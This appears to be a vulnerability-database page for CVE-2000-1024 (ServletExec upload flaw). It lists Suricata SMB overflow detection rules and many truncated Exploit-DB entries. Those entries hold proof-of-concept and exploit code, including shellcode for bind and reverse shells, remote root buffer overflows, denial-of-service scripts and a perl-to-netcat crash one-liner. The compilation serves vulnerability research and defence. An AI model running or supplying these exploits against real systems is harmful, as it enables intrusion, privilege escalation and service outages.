CVE-2000-1024
published 2000-12-11
Priority: P3 · 41
CVSS 2.0: 10 critical · AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS: 5.13% (91.3rd percentile)
eWave ServletExec 3.0C and earlier does not restrict access to the UploadServlet Java/JSP servlet, which allows remote attackers to upload files and execute arbitrary commands.
Affected: 1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unify | ewave_servletexec | — | — |
Suricata
GPL NETBIOS SMB OpenKey little endian overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103219; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_0377,
Suricata
GPL NETBIOS SMB-DS OpenKey overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103226; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_0377, confidence Medium, signature
Suricata
GPL NETBIOS SMB-DS OpenKey little endian overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103227; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_
Suricata
GPL NETBIOS SMB OpenKey andx overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; clas
Suricata
GPL NETBIOS SMB OpenKey overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103218; rev:5; metadata:cre
Suricata
GPL NETBIOS SMB-DS OpenKey andx overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377
Suricata
GPL NETBIOS SMB OpenKey little endian andx overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1
Suricata
GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt
suricata · 2010-09-23 · CVE-2000-0377
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bug
Exploit-DB
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb · 2019-08-12 · CVE-2019-12255 · CVSS 9.8 (CRITICAL)
---
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
    ip = "192.168.10.199"
    dport = 23
    seq_num = 1000
    payload = "\x42"*2000
    sport = random.randint(1024,65535)
    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
    syn_ack = sr1(syn)
    seq_num = seq_num + 1
    ack_num = syn
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb · 2007-07-18 · CVE-2007-3764
---
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
exploitdb · 2007-03-29 · CVE-2007-1675
---
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on Windows
# 2000 Server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other Windows platforms as well. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, 143))
    response = sock.recv(1024)
    print response
    auth = 'a0
Exploit-DB
Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service
exploitdb · 2006-12-25 · CVE-2006-6723
---
#!/usr/bin/python
# MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07
# Tested on:..
# - Windows XP SP2 Polish
# - Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# wks_dos.py 192.168.0.2 512
#
# [*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445 (NULL Session)
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# NetrWkstaUserEnum(max_len = 1024 * 1024 * 512)
# Exploit --> NULL Session --> PIPE: browser --> NetrWkstaUserEnum() --> Windows XP
# svchost.exe memory usage: 512 MB
##
Exploit-DB
Star FTP Server 1.10 - 'RETR' Remote Denial of Service
exploitdb · 2006-12-17 · CVE-2006-6643
---
# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro http://iHACK.pl
from socket import *
from sys import exit
print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro http://iHACK.pl'
host = '127.0.0.1'
port = 21
username = 'necro'
password = 'dupa'
evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'
s = socket(AF_INET, SOCK_STREAM)
try:
    s.connect((host, port))
except:
    print '\n[-] Connection Error'
    exit()
s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()
print '[+] Done, shutdown.'
# milw0rm.com [2006-12-17]
Exploit-DB
Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service
exploitdb · 2006-12-01 · CVE-2006-6296
---
#!/usr/bin/python
# MS Windows spoolss GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07
# Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# C:\>python spoolss_dos.py 192.168.0.2 512
#
# [*] MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# Exploit --> GetPrinterData(handle, value, 1024 * 1024 * 512) --> MS_Windows
# Spooler service(spoolsv.exe) memory usage: 512 MB
##
from impacket.structure import Structure
from impacket.nmb import NetBIOSTimeout
fro
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb · 2006-09-27 · CVE-2006-5112
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb · 2006-08-21 · CVE-2006-4318
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service
exploitdb · 2001-12-10 · CVE-2001-1184
---
// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (i.e. "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negat
Exploit-DB
Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service
exploitdb · 2001-12-10 · CVE-2001-1184
---
// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (i.e. "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negat
Exploit-DB
LPRng 3.6.22/23/24 - Remote Command Execution
exploitdb · 2000-12-11 · CVE-2000-0917
---
/*
* LPRng remote root exploit for x86 Linux
* 9/27/00
*
* - sk8
* tested on compiled LPRng 3.6.22/23/24
*
*/
#include
#include
char sc[]=
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh";
#define NOP 0x90 //will be split up, doesn't matter
int main(int argc, char** argv) {
char getbuf[1000];
int bpad=0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=0;
int eiploc=0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=-1; //0xbffff2c8;
int hi=100;
int lo=200;
i
Exploit-DB
HP-UX FTPD - Remote Buffer Overflow
exploitdb · 2000-12-01 · CVE-2000-0699
---
/* theoretical exploit for hpux ftpd vulnerability */
/* not tested anywhere, needs tweaking */
/* (c) 2000 by babcia padlina ltd. */
#include
#include
#define NOPS 100
#define BUFSIZE 1024
char shellcode[] = /* HP-UX shellcode */
"\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b"
"\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41"
"\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02"
"\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34"
"\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68";
char nop[] = "\x08\x21\x02\x80"; /* PA-RISC NOP */
unsigned long ret = 0xdeadbeef;
int main(argc, argv)
int argc;
char **argv;
{
int stackofs;
char buf[BUFSIZ*2];
int i;
for (strcpy(buf,
Exploit-DB
Solaris/SPARC 2.7 / 7 locale - Format String
exploitdb · 2000-11-20 · CVE-2000-0844
---
/*
Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7
Based on the exploit by Warning3
For additional information see http://www.phreedom.org/solar/locale_sol.txt
By Solar Eclipse
Assistant Editor,
Phreedom Magazine
http://www.phreedom.org
10 Oct 2000
*/
#include
#include
#define NUM 98 /* default number of words to dump from the stack */
#define ALIGN 3 /* default align (can be 0, 1, 2, 3) */
#define RETLOCOFS -16 /* default offset of the return address location */
#define SHELLOFS -6 /* default offset of the jump location from the beginning of the shell buffer */
#define RETLOC 0xfffffffd
#define PATTERN 1024 /* format string buffer size */
#define SHELL 1024 /* shell buffer size */
#define NOP 0xac15a16e
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (2)
exploitdb · 2000-10-13 · CVE-2000-0973
---
1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (1)
exploitdb · 2000-10-13 · CVE-2000-0973
---
1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
Exploit-DB
Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service
exploitdb · 2000-06-08 · CVE-2000-0508
---
source: https://www.securityfocus.com/bid/1372/info
A denial of service attack exists in the NFS lock daemon supplied with Linux. By connecting to the port rpc.lockd is running on, and supplying random input, it will cause lockd to exit with an error. The socket associated with rpc.lockd is also not properly released, and cannot be rebound to without a reboot.
This vulnerability most likely affects all Linux distributions running NFS.
[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100021 1 tcp 1024 nlockmgr
100021 3 tcp 1024 nlockmgr
100024 1 udp 831 status
100024 1 tcp 833
Exploit-DB
Stelian Pop dump 0.4 - restore Buffer Overflow
exploitdb · 2000-06-07 · CVE-2000-0520
---
// source: https://www.securityfocus.com/bid/1330/info
A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges.
The buffer overflow lies in the tape.c source file:
/dump-0.4b15/compat/include/protocols/dumprestore.h: line 53: #define TP_BSIZE 1024
/dump-0.4b15/restore/tape.c: line 311: char buf[TP_BSIZE];
/dump-0.4b15/restore/tape.c: line 357: (void) fgets(buf, BUFSIZ, terminal)
/dump-0.4b15/restore/tape.c: line 382: (void) fgets(buf, BUFSIZ, terminal);
As BUFSIZ is defined to be 8192, the fgets() will
Exploit-DB
Allegro RomPager 2.10 - URL Request Denial of Service
exploitdb · 2000-06-01 · CVE-2000-0470 · CVSS 7.5 (HIGH)
---
Allegro's RomPager is reported prone to a remote denial of service vulnerability.
If a specifically malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser.
CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304
The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works
the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80
$ ping $ip_address # doesn't work
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
exploitdb · 2000-04-24 · CVE-2000-0317
---
/*
source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
i
Exploit-DB
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
exploitdb · 2000-03-23 · CVE-2000-0227
---
/*
source: https://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include
#include
#include
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb · 1999-07-13 · CVE-1999-0696
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
Exploit-DB
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
exploitdb · 1998-11-01 · CVE-2000-0795
---
/*
source: https://www.securityfocus.com/bid/1529/info
Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise.
*/
/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/
/*## /bin/lpstat #*/
#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03
Exploit-DB
IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow
exploitdb · 1997-01-01 · CVE-2000-0797
---
/*
source: https://www.securityfocus.com/bid/1526/info
Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges.
The gr_osview command produces a graphical display of memory-management activity, including memory usage, page faults, TLB activity, and page swapping. This display provides a realtime window into the overall operation of the system. The buffer overflow itself is in the command-line parsing code and can be overflowed via a long user-supplied string.
*/
/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/
/*## /usr/sbin/gr_osview #*/
#define NOPNUM 3000
#define ADRNUM 3000
#define PCHNUM 1024
#define ALLIGN 1
c
Exploit-DB
BSD / Linux - 'umount' Local Privilege Escalation
exploitdb · 1996-08-13 · CVE-2000-0218
---
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
#include
#include
#include
#include
#include
#include
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr
No writeups or analysis indexed.
Published: 2000-12-11